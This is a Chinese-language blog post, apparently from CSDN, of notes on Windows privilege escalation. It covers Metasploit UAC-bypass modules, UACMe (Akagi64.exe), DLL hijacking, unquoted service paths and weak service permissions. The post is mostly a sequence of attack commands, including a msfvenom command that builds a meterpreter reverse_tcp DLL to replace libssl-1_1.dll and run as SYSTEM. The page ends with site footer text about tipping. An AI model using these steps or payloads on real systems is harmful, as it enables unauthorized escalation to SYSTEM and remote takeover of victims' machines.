windows 提权bypassuac,dll劫持,引号路径,不安全服务

使用msf模块进行bypassuac

search uac 查找关于uac的模块

use exploit/windows/local/bypassuac 

set session 1

run

windwos 10 使用msf提权:
use exploit/windows/local/bypassuac_sluihijack

use exploit/windows/local/bypassuac_silentcleanup

set session 1

UACMe进行bypassuac

上传uacme

常用61,41,23

利用Akagi64.exe 41 C:\phpstudy_pro\WWW\pikachu-master\vul\unsafeupload\uploads\msf.exe

执行木马上线msf

msf再次执行getsystem

dll劫持提权

提权原理:

Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:

1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)

使用火绒剑分析该进程执行时加载了哪些dll

使用msf生成dll文件

msfvenom -p windows/meterpreter/reverse_tcp lhost= xxxx  lport=4444 -f dll >./libssl-1_1.dll

替换相关dll文件

不带引号服务路径配合MSF-MacroExPert

原理:文件在执行的时候加载路径,如果是"c:\program (x86)\1.exe"则被视为完整路径

如果为c:\program (x86)\1.exe 则被视为参数,前提未加引号路径需要带空格。

利用msf生成木马为program.exe的文件放置c盘符根路径,启动程序,msf会话监听可完成提权。

检测服务端不带引号服务路径项目:
GitHub - 411Hall/JAWS: JAWS - Just Another Windows (Enum) Script

不安全的服务权限

不安全的服务权限配合MSF提权 - vjan - 博客园

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值